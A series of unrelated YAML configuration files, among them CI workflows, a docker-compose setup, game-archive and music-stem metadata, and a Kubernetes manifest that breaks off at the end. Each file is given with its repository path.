docker_openshift_cluster_monitoring_namespace: docker.io/tripleomaster
docker_openshift_cluster_monitoring_image: coreos-cluster-monitoring-operator
docker_openshift_configmap_reload_namespace: docker.io/tripleomaster
docker_openshift_configmap_reload_image: coreos-configmap-reload
docker_openshift_prometheus_operator_namespace: docker.io/tripleomaster
docker_openshift_prometheus_operator_image: coreos-prometheus-operator
docker_openshift_prometheus_config_reload_namespace: docker.io/tripleomaster
docker_openshift_prometheus_config_reload_image: coreos-prometheus-config-reloader
docker_openshift_kube_rbac_proxy_namespace: docker.io/tripleomaster
docker_openshift_kube_rbac_proxy_image: coreos-kube-rbac-proxy
docker_openshift_kube_state_metrics_namespace: docker.io/tripleomaster
docker_openshift_kube_state_metrics_image: coreos-kube-state-metrics
deploy_steps_ansible_workflow: true
config_download_args: >-
-e {{ working_dir }}/config-download.yaml
--disable-validations
--verbose
composable_roles: true
overcloud_roles:
- name: Controller
CountDefault: 1
tags:
- primary
- controller
networks:
- External
- InternalApi
- Storage
- StorageMgmt
- Tenant
- name: Compute
CountDefault: 0
tags:
- compute
networks:
- External
- InternalApi
- Storage
- StorageMgmt
- Tenant
# Tempest configuration, keep always at the end of the file
# Run tempest in containers when at least undercloud is containerized
tempest_format: >-
{% if containerized_undercloud|bool -%}
container
{%- else -%}
packages
{%- endif -%}
# If `run_tempest` is `true`, run tempests tests, otherwise do not
# run them.
tempest_config: false
test_ping: false
run_tempest: false
|
config/general_config/featureset033.yml
|
param:
## Sensing params
T: 1 # Duration of sensing needed for one estimate
fs_audio: 16000 # sampling frequency [Hz]
channels: 1 # channels
## Battery params
battery_charge: 2100 # battery capacity - AA NiMH [mAh]
battery_n: 1 # amount of batteries used
battery_efficiency: 0.8 # battery efficiency
battery_V: 2.2 # battery voltage
battery_joules: battery_n * battery_charge*battery_efficiency * battery_V * 3600 # [mJ]
## Processing architecture
S: 16 # Precision/word size [bit]
Eop: 500*10^(-9) # [mJ] # GPP
# Eop: 100*10^(-9) # [mJ] # DSP
# Eop: 10*10^(-9) # [mJ] # ASIP
# Eop: 1*10^(-9) # [mJ] # ASIC
c: [2, 1, 1, 8, 1, 2, 25] # [c_mac, c_add, c_mul, c_div, c_cmp, c_exp, c_log] (Table 2) >> [MAC, ADD, Multiplication, Division, Comparator, e^x, log], GPP/DSP
# c: [1, 1, 1, 1, 1, 1, 1] # [c_mac, c_add, c_mul, c_div, c_cmp, c_exp, c_log] (Table 2) >> [MAC, ADD, Multiplication, Division, Comparator, e^x, log], ASIP/ASIC
## Memory specific parameters
memacc_c: [4, 3, 3, 3, 3, 2, 2] # Amount of memory accesses for each operation
nr_mem: 3 # Number of memory options available
Ema: [100*10^(-12), 100*10^(-9), 100*10^(-9)] # Energy per memory access, [on-chip SRAM, off-chip SRAM, off-chip DRAM] [mJ/bit] (Table 2)
Ems: [50*10^(-9), 10*10^(-9), 75*10^(-9)] # Energy memory leakage, [on-chip SRAM, off-chip SRAM, off-chip DRAM] [mW/bit] (Table 2)
stand_mem: 2 # standard memory id where everything should be stored (in case not provided by feat/classf config)
stand_mem_ow: 0 # Overwrite used memory for the entire processing layer config [true/false]
stand_outsave: 1 # standard setting if output of layer is stored in-place or not [true/false].
stand_outacc: 1 # standard setting of how many mem accesses of a certain operation are comming from data of prev layer
## Other
macid: 1 # operation category index ids [MAC, ADD, Multiplication, Division, Comparator, e^x, log], multiply-acc
addid: 2 # addition id
multid: 3 # multiplication id
divid: 4 # division id
compid: 5 # comparator
expid: 6 # exponential
logid: 7 # logarithm
nr_arop: 7 # number of arithmetic operations
chid: 1 # dimension index ids, channel
featid: 2 # feature id
frameid: 3 # time id
nr_dimensions: 3 #total dimensions
|
general/params/default.yaml
|
version: "3.4"
services:
server:
image: ${DEEPHAVEN_SERVER_IMAGE}
# For jprofiler, replace the line before this comment block with the line below:
#build:
# context: ./jprofiler-server
# args:
# - DEEPHAVEN_SERVER_IMAGE=${DEEPHAVEN_SERVER_IMAGE}
environment:
# https://bugs.openjdk.java.net/browse/JDK-8230305
# cgroups v2 resource reservations only work w/ java 15+ ATM, so it's best for our java processes to be explicit
# with max memory.
#
# To turn on debug logging, add: -Dlogback.configurationFile=logback-debug.xml
- JAVA_TOOL_OPTIONS=-Xmx4g -Ddeephaven.console.type=${DEEPHAVEN_CONSOLE_TYPE} -Ddeephaven.application.dir=${DEEPHAVEN_APPLICATION_DIR}
#
# For remote debugging switch the line above for the one below (and also change the ports below)
# - JAVA_TOOL_OPTIONS=-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -Xmx4g -Ddeephaven.console.type=${DEEPHAVEN_CONSOLE_TYPE} -Ddeephaven.application.dir=${DEEPHAVEN_APPLICATION_DIR}
#
# For jprofiler sessions (if you tweaked the jprofiler version in jprofiler-server/Dockerfile you need to tweak path)
# - JAVA_TOOL_OPTIONS=-agentpath:/opt/jprofiler13.0/bin/linux-x64/libjprofilerti.so=port=8849,nowait -Xmx4g -Ddeephaven.console.type=${DEEPHAVEN_CONSOLE_TYPE} -Ddeephaven.application.dir=${DEEPHAVEN_APPLICATION_DIR}
expose:
- '8080'
# For remote debugging (change if using different port)
# ports:
# - '5005:5005'
# For jprofiler (change if using different port)
# ports:
# - '8849:8849'
# Note: using old-style volume mounts, so that the directories get created if they don't exist
# See https://docs.docker.com/storage/bind-mounts/#differences-between--v-and---mount-behavior
volumes:
- ./data:/data
deploy:
resources:
limits:
cpus: '4.0'
# Allows the querying of this process jinfo/jmap
# docker-compose exec server jmap -heap 1
# docker-compose exec server jinfo 1
#
# Add NET_ADMIN to allow throttling network speeds
# $ docker exec -it core_server_1 apt-get install iproute2
# $ docker exec core_server_1 tc qdisc add dev eth0 root netem delay 10ms
cap_add:
- SYS_PTRACE
web:
image: deephaven/web:local-build
expose:
- "80"
volumes:
- ./data:/data
deploy:
resources:
limits:
cpus: '1'
memory: 256M
# Should only be used for non-production deployments, see grpc-proxy/README.md for more info
grpc-proxy:
image: deephaven/grpc-proxy:local-build
environment:
- BACKEND_ADDR=server:8080
expose:
- '8080'
# - '8443' #unused
deploy:
resources:
limits:
cpus: '1'
memory: 256M
envoy:
# A reverse proxy configured for no SSL on localhost. It fronts the requests
# for the static content and the websocket proxy.
image: deephaven/envoy:local-build
ports:
- "${DEEPHAVEN_PORT}:10000"
# - '9090:9090' #envoy admin
deploy:
resources:
limits:
cpus: '1'
memory: 256M
|
docker-compose-common.yml
|
name: GitHub clones counter for 14 days at every 8 hours and clones accumulator
on:
schedule:
- cron: "0 */8 * * *"
# Allows you to run this workflow manually from the Actions tab
workflow_dispatch:
jobs:
traffic-clones:
runs-on: ubuntu-latest
env:
traffic_clones_json: traffic/clones.json
traffic_clones_accum_json: traffic/clones-accum.json
steps:
- name: allocate directories
run: |
mkdir $GITHUB_WORKSPACE/gh-workflow $GITHUB_WORKSPACE/gh-stats
- name: checkout gh-workflow
uses: actions/checkout@v2
with:
repository: 'andry81/gh-workflow'
path: gh-workflow
- name: checkout gh-stats
uses: actions/checkout@v2
with:
repository: 'andry81/tacklebar--external_tools--gh-stats'
path: gh-stats
token: ${{ secrets.SECRET_TOKEN }}
- name: request traffic clones json
run: |
curl --user "${{ github.actor }}:${{ secrets.SECRET_TOKEN }}" \
-H "Accept: application/vnd.github.v3+json" \
https://api.github.com/repos/andry81/tacklebar--external_tools/traffic/clones \
> "$GITHUB_WORKSPACE/gh-stats/$traffic_clones_json"
- name: accumulate traffic clones
shell: bash
run: |
cd $GITHUB_WORKSPACE/gh-stats
chmod ug+x $GITHUB_WORKSPACE/gh-workflow/bash/github/accum-traffic-clones.sh
$GITHUB_WORKSPACE/gh-workflow/bash/github/accum-traffic-clones.sh
- name: commit gh-stats
run: |
cd $GITHUB_WORKSPACE/gh-stats
git add .
git config --global user.name "GitHub Action"
git config --global user.email "<EMAIL>"
git commit -m "Automated traffic/clones update"
- name: push gh-stats
uses: ad-m/github-push-action@master
with:
repository: 'andry81/tacklebar--external_tools--gh-stats'
directory: gh-stats
github_token: ${{ secrets.SECRET_TOKEN }}
|
.github/workflows/tacklebar-gh-clone-stats.yml
|
matrix:
include:
- name: 'Unit Tests'
language: python
python: 3.6
script:
- git clone --depth 1 https://github.com/per1234/inoliblist.git "${TRAVIS_BUILD_DIR}/../inoliblist"
- python "${TRAVIS_BUILD_DIR}/tests/test_inolibbuglist.py" --ghtoken $GITHUB_TOKEN --github_login per1234 --browser_command "\"/c/Program Files/Mozilla Firefox/firefox.exe\" -new-tab" --arduino_ci_script_branch master --arduino_ci_script_application_folder "${HOME}" --arduino_ci_script_arduino_ide_version "1.8.6"
- name: 'PEP8 Compliance Check'
language: python
python: 3.6
before_install:
- pip install pycodestyle
script:
- find "${TRAVIS_BUILD_DIR}" -path "${TRAVIS_BUILD_DIR}/.git" -prune -or -name '*.py' -exec pycodestyle {} +
- name: 'File Formatting Checks'
language: minimal
script:
# Check for UTF-8 BOM file encoding
- find "${TRAVIS_BUILD_DIR}" -path "${TRAVIS_BUILD_DIR}/.git" -prune -or -type f -exec grep --files-with-matches --binary-files=without-match $'\xEF\xBB\xBF' '{}' \; -exec echo 'UTF-8 BOM encoding detected.' \; -exec false '{}' +
# Check for files starting with a blank line
- find "${TRAVIS_BUILD_DIR}" -path "${TRAVIS_BUILD_DIR}/.git" -prune -or -type f -print0 | xargs -0 -L1 bash -c 'head -1 "$0" | grep --binary-files=without-match --regexp="^$"; if [[ "$?" == "0" ]]; then echo "Blank line found at start of $0."; false; fi'
# Check for tabs
- find "${TRAVIS_BUILD_DIR}" -path "${TRAVIS_BUILD_DIR}/.git" -prune -or \( -not -name '*.csv' -and -type f \) -exec grep --with-filename --line-number --binary-files=without-match --regexp=$'\t' '{}' \; -exec echo 'Tab found.' \; -exec false '{}' +
# Check for trailing whitespace
- find "${TRAVIS_BUILD_DIR}" -path "${TRAVIS_BUILD_DIR}/.git" -prune -or \( -not -name '*.csv' -and -type f \) -exec grep --with-filename --line-number --binary-files=without-match --regexp='[[:blank:]]$' '{}' \; -exec echo 'Trailing whitespace found.' \; -exec false '{}' +
# Check for non-Unix line endings
- find "${TRAVIS_BUILD_DIR}" -path "${TRAVIS_BUILD_DIR}/.git" -prune -or -type f -exec grep --files-with-matches --binary-files=without-match --regexp=$'\r$' '{}' \; -exec echo 'Non-Unix EOL detected.' \; -exec false '{}' +
# Check for blank lines at end of files
- find "${TRAVIS_BUILD_DIR}" -path "${TRAVIS_BUILD_DIR}/.git" -prune -or -type f -print0 | xargs -0 -L1 bash -c 'tail -1 "$0" | grep --binary-files=without-match --regexp="^$"; if [[ "$?" == "0" ]]; then echo "Blank line found at end of $0."; false; fi'
# Check for files that don't end in a newline (https://stackoverflow.com/a/25686825)
- find "${TRAVIS_BUILD_DIR}" -path "${TRAVIS_BUILD_DIR}/.git" -prune -or -type f -print0 | xargs -0 -L1 bash -c 'if test "$(grep --files-with-matches --binary-files=without-match --max-count=1 --regexp='.*' "$0")" && test "$(tail --bytes=1 "$0")"; then echo "No new line at end of $0."; false; fi'
- name: 'Spell Check'
language: python
python: 3.6
before_install:
- pip install codespell
script:
- codespell --skip="${TRAVIS_BUILD_DIR}/.git" --ignore-words="${TRAVIS_BUILD_DIR}/etc/codespell-ignore-words-list.txt" "${TRAVIS_BUILD_DIR}"
notifications:
email:
on_success: always
on_failure: always
webhooks:
urls:
# Use TravisBuddy to automatically comment on any pull request that results in a failed CI build
- https://www.travisbuddy.com/
on_success: never
on_failure: always
|
.travis.yml
|
name: check
on:
push:
pull_request:
schedule:
- cron: '0 8 * * *'
jobs:
lint:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: actions/setup-python@v2
- name: set PY
run: echo "::set-env name=PY::$(python -c 'import hashlib, sys;print(hashlib.sha256(sys.version.encode()+sys.executable.encode()).hexdigest())')"
- uses: actions/cache@v2
with:
path: ~/.cache/pre-commit
key: pre-commit|${{ env.PY }}|${{ hashFiles('.pre-commit-config.yaml') }}
- uses: pre-commit/action@v1.1.0
test:
name: test ${{ matrix.py }} - ${{ matrix.os }}
runs-on: ${{ matrix.os }}-latest
strategy:
fail-fast: false
matrix:
os:
- Ubuntu
py:
- 3.8
- 3.7
- 3.6
steps:
- name: install OS dependencies
run: |
${{ runner.os == 'Linux' && 'sudo apt-get update -y && sudo apt-get install libavro-dev pkg-config' || true}}
shell: bash
- name: setup python for tox
uses: actions/setup-python@v2
with:
python-version: 3.8
- name: install tox
run: python -m pip install tox
- uses: actions/checkout@v2
- name: setup python for test ${{ matrix.py }}
uses: actions/setup-python@v2
with:
python-version: ${{ matrix.py }}
- name: pick environment to run
run: |
import subprocess; import json
major, minor, impl = json.loads(subprocess.check_output(["python", "-c", "import json; import sys; import platform; print(json.dumps([sys.version_info[0], sys.version_info[1], platform.python_implementation()]));"], universal_newlines=True))
print('::set-env name=TOXENV::' + ("py" if impl == "CPython" else "pypy") + ("{}{}".format(major, minor) if impl == "CPython" else ("3" if major == 3 else "")))
shell: python
- name: setup test suite
run: tox -vv --notest
- name: run test suite
run: tox --skip-pkg-install
env:
PYTEST_ADDOPTS: "-vv --durations=20"
CI_RUN: 'yes'
DIFF_AGAINST: HEAD
- name: rename coverage report file
run: |
import os; os.rename('.tox/coverage.{}.xml'.format(os.environ['TOXENV']), '.tox/coverage.xml')
shell: python
- uses: codecov/codecov-action@v1
with:
file: ./.tox/coverage.xml
flags: tests
name: ${{ matrix.py }} - ${{ matrix.os }}
|
.github/workflows/check.yml
|
---
_id: dc350b20-1c08-11e8-a0fe-3ffbe97072a6
benchmark:
id: 7a
version: '0'
data:
- name: run_time
values:
- sim_time: '17985.32'
wall_time: '17986'
- name: memory_usage
values:
- unit: KB
value: '1229176'
- description: Using 2^-13 for time step size
format:
parse:
L2: number
grid: number
type: csv
name: spatial
transform:
- as: x
expr: datum.grid
type: formula
- as: y
expr: datum.L2
type: formula
type: line
url: https://gist.githubusercontent.com/wd15/c7cbecda6798c9a1cbecedf5fabea7dd/raw/cc87e95b1c7f770fcaa02468f09659018d1258b6/gistfile1.txt
- description: Using 2^-10 for dx and dy.
format:
parse:
L2: number
step: number
type: csv
name: temporal
transform:
- as: x
expr: datum.step
type: formula
- as: y
expr: datum.L2
type: formula
type: line
url: https://raw.githubusercontent.com/narutse/phasefield/master/data/FBEtimeL2.csv
- description: loglog plot of spatial convergence
name: spatialplot
type: image
url: https://raw.githubusercontent.com/narutse/phasefield/master/plots/FBEspace.png
- description: loglog plot of time convergence
name: temporalplot
type: image
url: https://raw.githubusercontent.com/narutse/phasefield/master/plots/FBEtime.png
date: 1519768501
layout: post
metadata:
author:
email: <EMAIL>
first: Narut
github_id: narutse
last: Sereewattanawoot
hardware:
acc_architecture: none
clock_rate: '4.6'
cores: '1'
cpu_architecture: x86_64
nodes: '1'
parallel_model: serial
implementation:
container_url: ''
name: custom
repo:
url: https://github.com/narutse/phasefield
version: 376a50252e28de3f9a415d7b1e8e6b0e762367ff
summary: Spatial and temporal convergence data for my serial version with first-order
in time, second-order in space Euler method. I treat non-linear terms explicitly,
but linear terms implicitly in order to measure time convergence. (Spatial error
will dominate with purely explicit Euler everywhere it's stable.) Will parallelize
for the later parts of this problem.
timestamp: 23 February, 2018
|
_data/simulations/Forward_Backward_Euler/meta.yaml
|
--- !<MAP>
contentType: "MAP"
firstIndex: "2019-10-11 09:30"
game: "Unreal"
name: "SP-DontShootTheChest1"
author: "Tobby \"GTD-Carthage\" Ong"
description: "None"
releaseDate: "2014-02"
attachments: []
originalFilename: "SP-DontShootTheChest1_v100.7z"
hash: "c8078604fd5d0f40072b0c7b227cc13d149b935e"
fileSize: 11999913
files:
- name: "Marine.uax"
fileSize: 1688796
hash: "c512729e25ed1a6793c9496cf2d2d092b82aaff6"
- name: "caitsith.umx"
fileSize: 162282
hash: "17f798a4ece34a33519148b66317ee1e11d00fbf"
- name: "Sky.utx"
fileSize: 4228486
hash: "76f55cbb2d7a17ec74e59636831413edb3cd8c8a"
- name: "UPak.u"
fileSize: 11571933
hash: "1edea32a13f6ac09ab91ee673fb52317344acb88"
- name: "SP-DontShootTheChest1.unr"
fileSize: 15420297
hash: "dd64735755d7e9f229610117e95be0598768e9e8"
- name: "UPakFonts.utx"
fileSize: 3325182
hash: "b196151004470c64d872ef8895dd176d2b4778b6"
- name: "UPakFix.u"
fileSize: 46931
hash: "40e0c76c2b09d07611efdc263c35e7cb364d9abc"
otherFiles: 1
dependencies:
SP-DontShootTheChest1.unr:
- status: "MISSING"
name: "Emitter"
- status: "OK"
name: "caitsith"
- status: "OK"
name: "sky"
downloads:
- url: "https://www.newbiesplayground.net/download/maps/coop_maps/SP-DontShootTheChest1_v100.7z"
main: false
repack: false
state: "OK"
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Maps/Single%20Player/D/c/8/078604/SP-DontShootTheChest1_v100.7z"
main: true
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal/Maps/Single%20Player/D/c/8/078604/SP-DontShootTheChest1_v100.7z"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal/Maps/Single%20Player/D/c/8/078604/SP-DontShootTheChest1_v100.7z"
main: false
repack: false
state: "OK"
deleted: false
gametype: "Single Player"
title: "Under Deldaram"
playerCount: "Unknown"
themes:
Nali Temple: 0.8
Natural: 0.1
Nali Castle: 0.1
bots: true
|
content/Unreal/Maps/Single Player/D/c/8/078604/sp-dontshootthechest1_[c8078604].yml
|
--- !<SKIN>
contentType: "SKIN"
firstIndex: "2018-12-26 00:28"
game: "Unreal Tournament"
name: "He-Man"
author: "Unknown"
description: "None"
releaseDate: "2000-11"
attachments: []
originalFilename: "motuskinsv1.zip"
hash: "a32ed57703a6a9c960b5e6a702622fa01919fbe2"
fileSize: 4665242
files:
- name: "Soldierskins-hisssnake.utx"
fileSize: 798156
hash: "140dea0324aee1095dfe438977430f999fb4ab05"
- name: "SGirlskins-teela.utx"
fileSize: 1241428
hash: "21baf2f7e6ce008091fd3935ebfb9708b119e8c0"
- name: "Soldierskins-rio.utx"
fileSize: 798154
hash: "1a40903fdbdeb42b14fac85738c916a6d3a21075"
- name: "soldierskins-mane.utx"
fileSize: 1241410
hash: "13a8c5cf39fdd7b4f893e0202180abcf8ffc65c1"
- name: "soldierskins-buzzoff.utx"
fileSize: 1152762
hash: "ef1237d7a2a4d131ca775bc4e4db2d5ad4d3754a"
- name: "Soldierskins-He-Ro.utx"
fileSize: 1330081
hash: "4b3225b016346b885b654ff8b6fa8923dd1ec67b"
- name: "soldierskins-roboto.utx"
fileSize: 1418743
hash: "d6f48ec32863fa34290522b7971a34e5130e73a4"
- name: "soldierskins-skeletor.utx"
fileSize: 1241414
hash: "d8faa7d99e1f385a745c8c10225efa80b4b76a52"
- name: "Soldierskins-heman.utx"
fileSize: 1241425
hash: "92151c60ca7261c35271cf26e271c22e4e3313f7"
- name: "soldierskins-beasstman.utx"
fileSize: 1152766
hash: "6e765316be3426dba2dc187fdf387fa4ab9d8ad5"
otherFiles: 11
dependencies: {}
downloads:
- url: "https://gamefront.online/files2/service/thankyou?id=1420064"
main: false
repack: false
state: "MISSING"
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Skins/H/motuskinsv1.zip"
main: true
repack: false
state: "OK"
- url: "http://www.ut-files.com/index.php?dir=Skins/SkinsM/&file=motuskinsv1.zip"
main: false
repack: false
state: "OK"
- url: "http://uttexture.com/UT/Downloads/Skins/Misc/SkinsM/motuskinsv1.zip"
main: false
repack: false
state: "OK"
- url: "http://uttexture.com/UT/Downloads/Skins/SkinPacks/motuskinsv1.zip"
main: false
repack: false
state: "OK"
- url: "http://medor.no-ip.org/index.php?dir=Skins/&file=motuskinsv1.zip"
main: false
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Skins/H/a/3/2ed577/motuskinsv1.zip"
main: false
repack: false
state: "OK"
- url: "http://ut-files.com/index.php?dir=Skins/SkinsM/&file=motuskinsv1.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Skins/H/a/3/2ed577/motuskinsv1.zip"
main: false
repack: false
state: "OK"
deleted: false
skins:
- "He-Man"
- "Man-E-Faces"
- "Roboto"
- "BeastMan"
- "King Hiss"
- "Skeletor"
- "Teela"
- "He-Ro"
- "RioBlast"
- "Buzzoff"
faces:
- "Human"
- "Monster"
- "Robot"
- "Team Blue"
- "Team Gold"
- "Team Green"
- "Team Red"
- "Beast Man"
- "With Pupils"
- "Hiss"
- "Snake Green"
- "Normal "
- "Team Blue"
- "Team Green"
- "Team Red"
- "Evil Twin"
model: "Unknown"
teamSkins: true
|
content/Unreal Tournament/Skins/H/a/3/2ed577/he-man_[a32ed577].yml
|
name: "Grid.ai Run Artifact"
inputs:
# required
script-name:
required: true
default: "run.py"
type: string
description: "The name of the script to run"
script-dir:
required: false
default: "${GITHUB_WORKSPACE}"
type: string
description: "Directory where the script is at"
# optional
cluster-name:
required: false
default: ""
type: string
description: "Arguments to grid run command"
grid-args:
required: false
default: "--localdir --instance_type t2.medium --dependency_file requirements.txt"
type: string
description: "Arguments to grid run command"
script-args:
required: false
default: ""
type: string
description: "Arguments to the script"
success-status:
required: false
default: "succeeded"
type: string
description: "grid run status text for successful execution"
outputs:
obj-type:
value: ${{ steps.gridai-obj-status.outputs.obj-type }}
description: "object id searched for"
obj-id:
value: ${{ steps.gridai-obj-status.outputs.obj-id }}
description: "object id searched for"
obj-status:
value: ${{ steps.gridai-obj-status.outputs.obj-status }}
description: "comma delimited status all of objects. ex: succeeded,succeeded,stopped"
obj-tally:
value: ${{ steps.gridai-obj-status.outputs.obj-tally }}
description: "comma delimited tally status codes. ex: 2 succeeded,1 stopped"
obj-summary:
value: ${{ steps.gridai-obj-status.outputs.obj-summary }}
description: "comma delimited unique status codes. ex: succeeded,stopped"
obj-exit-code:
value: ${{ steps.gridai-obj-status.outputs.obj-exit-code }}
description: "0 if exited finding the supplied status, 1 otherwise"
runs:
using: "composite"
steps:
- run: |
cd ${{ inputs.script-dir }}
pwd
shell: bash
- run: |
cd ${{ inputs.script-dir }}
grid run ${{ inputs.cluster-name }} ${{ inputs.grid-args }} ${{ inputs.script-name }} ${{ inputs.script-args }} | tee grid.run.log
export run_name=$(cat grid.run.log | awk -F: '$1=/grid_name/ {print $2}' | tr -s '[:blank:]')
echo "run_name=${run_name}" >> $GITHUB_ENV
if [[ -z "${run_name}" ]]; then
echo "Error: 'grid_name:[run_name]' not found in output"
exit 1
fi
shell: bash
- id: gridai-obj-status
uses: gridai-actions/gridai-status@main
with:
obj-type: run
obj-id: ${run_name}
- run: |
if [ -z "$(echo ${{ steps.gridai-obj-status.outputs.obj-summary }} | grep '${{ inputs.success-status }}')" ]; then
exit 1
fi
shell: bash
- run: |
cd ${{ inputs.script-dir }}
pwd
grid artifacts ${{ env.run_name }}
if [[ $? != 0 ]]; then
echo "Error: ${run_name} artifacts not found"
exit 1
fi
find grid_artifacts -type f -print | sort
shell: bash
|
action.yml
|
album: Shaking Through Volume 3
artist: Strand of Oaks
composer:
- <NAME>
excerpt: 'no'
genre: Pop
has_bleed: 'no'
instrumental: 'no'
mix_filename: StrandOfOaks_Spacestation_MIX.wav
origin: Weathervane Music
producer:
- <NAME>
raw_dir: StrandOfOaks_Spacestation_RAW
stem_dir: StrandOfOaks_Spacestation_STEMS
stems:
S01:
component: bass
filename: StrandOfOaks_Spacestation_STEM_01.wav
instrument: electric bass
raw:
R01:
filename: StrandOfOaks_Spacestation_RAW_01_01.wav
instrument: electric bass
S02:
component: ''
filename: StrandOfOaks_Spacestation_STEM_02.wav
instrument: vocalists
raw:
R01:
filename: StrandOfOaks_Spacestation_RAW_02_01.wav
instrument: female singer
R02:
filename: StrandOfOaks_Spacestation_RAW_02_02.wav
instrument: female singer
R03:
filename: StrandOfOaks_Spacestation_RAW_02_03.wav
instrument: male singer
S03:
component: ''
filename: StrandOfOaks_Spacestation_STEM_03.wav
instrument: drum set
raw:
R01:
filename: StrandOfOaks_Spacestation_RAW_03_01.wav
instrument: drum set
R02:
filename: StrandOfOaks_Spacestation_RAW_03_02.wav
instrument: drum set
R03:
filename: StrandOfOaks_Spacestation_RAW_03_03.wav
instrument: drum set
R04:
filename: StrandOfOaks_Spacestation_RAW_03_04.wav
instrument: kick drum
R05:
filename: StrandOfOaks_Spacestation_RAW_03_05.wav
instrument: drum set
R06:
filename: StrandOfOaks_Spacestation_RAW_03_06.wav
instrument: drum set
R07:
filename: StrandOfOaks_Spacestation_RAW_03_07.wav
instrument: snare drum
R08:
filename: StrandOfOaks_Spacestation_RAW_03_08.wav
instrument: snare drum
R09:
filename: StrandOfOaks_Spacestation_RAW_03_09.wav
instrument: toms
R10:
filename: StrandOfOaks_Spacestation_RAW_03_10.wav
instrument: toms
S04:
component: melody
filename: StrandOfOaks_Spacestation_STEM_04.wav
instrument: male singer
raw:
R01:
filename: StrandOfOaks_Spacestation_RAW_04_01.wav
instrument: male singer
S05:
component: ''
filename: StrandOfOaks_Spacestation_STEM_05.wav
instrument: auxiliary percussion
raw:
R01:
filename: StrandOfOaks_Spacestation_RAW_05_01.wav
instrument: shaker
R02:
filename: StrandOfOaks_Spacestation_RAW_05_02.wav
instrument: tambourine
S06:
component: ''
filename: StrandOfOaks_Spacestation_STEM_06.wav
instrument: piano
raw:
R01:
filename: StrandOfOaks_Spacestation_RAW_06_01.wav
instrument: piano
R02:
filename: StrandOfOaks_Spacestation_RAW_06_02.wav
instrument: piano
R03:
filename: StrandOfOaks_Spacestation_RAW_06_03.wav
instrument: piano
R04:
filename: StrandOfOaks_Spacestation_RAW_06_04.wav
instrument: piano
S07:
component: ''
filename: StrandOfOaks_Spacestation_STEM_07.wav
instrument: synthesizer
raw:
R01:
filename: StrandOfOaks_Spacestation_RAW_07_01.wav
instrument: synthesizer
S08:
component: melody
filename: StrandOfOaks_Spacestation_STEM_08.wav
instrument: tack piano
raw:
R01:
filename: StrandOfOaks_Spacestation_RAW_08_01.wav
instrument: tack piano
R02:
filename: StrandOfOaks_Spacestation_RAW_08_02.wav
instrument: tack piano
title: Spacestation
version: 1.2
website:
- www.shakingthrough.com/strandofoaks
|
medleydb/data/Metadata/StrandOfOaks_Spacestation_METADATA.yaml
|
name: Test BlueGraph
on:
pull_request:
push:
branches:
- master
- github-action-test
jobs:
build:
runs-on: ubuntu-latest
strategy:
matrix:
python-version: [ 3.7, 3.8 ]
steps:
- uses: actions/checkout@v2
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v2
with:
python-version: ${{ matrix.python-version }}
- name: Get Neo4j from a third party repo and install
run: |
sudo add-apt-repository -y ppa:openjdk-r/ppa
sudo apt-get update
wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -
echo 'deb https://debian.neo4j.com stable latest' | sudo tee -a /etc/apt/sources.list.d/neo4j.list
sudo apt-get update
sudo add-apt-repository universe
sudo apt-get install neo4j=1:4.3.1
- name: Download the graph data science lib
run: |
wget https://s3-eu-west-1.amazonaws.com/com.neo4j.graphalgorithms.dist/graph-data-science/neo4j-graph-data-science-1.6.1-standalone.zip
unzip neo4j-graph-data-science-1.6.1-standalone.zip
sudo cp neo4j-graph-data-science-1.6.1.jar /var/lib/neo4j/plugins/
- name: Add conda to system path
run: |
# $CONDA is an environment variable pointing to the root of the miniconda directory
echo $CONDA/bin >> $GITHUB_PATH
- name: Useful for debugging any issues with conda
run: conda info -a
- name: Update the base env with graph-tool and faiss-gpu installed from conda-forge
run: |
conda install python=${{ matrix.python-version }}
conda env update --file test-environment.yml --name base
- name: Install the rest of the dependencies
run: |
python3 -m pip install .[dev]
- name: Configure the Neo4j database
run: |
sudo neo4j-admin set-initial-password <PASSWORD>
echo 'dbms.connector.bolt.listen_address=0.0.0.0:7687' | sudo tee -a /etc/neo4j/neo4j.conf
echo 'dbms.security.procedures.unrestricted=gds.*' | sudo tee -a /etc/neo4j/neo4j.conf
echo 'dbms.security.procedures.whitelist=gds.*' | sudo tee -a /etc/neo4j/neo4j.conf
cat /etc/neo4j/neo4j.conf
- name: Start a db instance and wait (it takes time to start)
run: |
sudo service neo4j restart
sleep 60
- name: Test with pytest
run: |
pytest --cov=./bluegraph
- name: Upload to codecov
if: ${{matrix.python-version == '3.7'}}
uses: codecov/codecov-action@v1
with:
fail_ci_if_error: false
files: ./coverage.xml
flags: pytest
name: "bluegraph-py37"
|
.github/workflows/test.yml
|
apiVersion: v1
kind: ConfigMap
metadata:
name: spinnaker-demo-config
namespace: ${parameters["namespace"]}
data:
NEW_FEATURE: "false"
---
apiVersion: apps/v1beta2
kind: Deployment
metadata:
name: spinnaker-demo
namespace: ${parameters["namespace"]}
labels:
##
# Nome da aplicação
app: spinnaker
##
# Equipe responsável pela aplicação. (operators, developers, supports)
team: developers
##
# Camada que a aplicação pertence. (frontend, backend, database)
tier: frontend
##
# O estágio ou fase em que a aplicação se encontra. (development, staging, qa, canary, production)
phase: ${parameters["phase"]}
##
# O número da versão. (por exemplo, 1.0.0)
version: ${parameters["version"]}
##
# Ambiente em que a aplicação está implantada. (development, staging, production)
environment: ${parameters["environment"]}
spec:
replicas: 2
selector:
matchLabels:
app: spinnaker
template:
metadata:
labels:
app: spinnaker
team: developers
tier: frontend
phase: ${parameters["phase"]}
version: ${parameters["version"]}
environment: ${parameters["environment"]}
spec:
containers:
- name: primary
image: ${parameters["image"]}
ports:
- containerPort: 8000
readinessProbe:
httpGet:
path: /
port: 8000
envFrom:
- configMapRef:
name: spinnaker-demo-config
---
kind: Service
apiVersion: v1
metadata:
name: spinnaker-demo
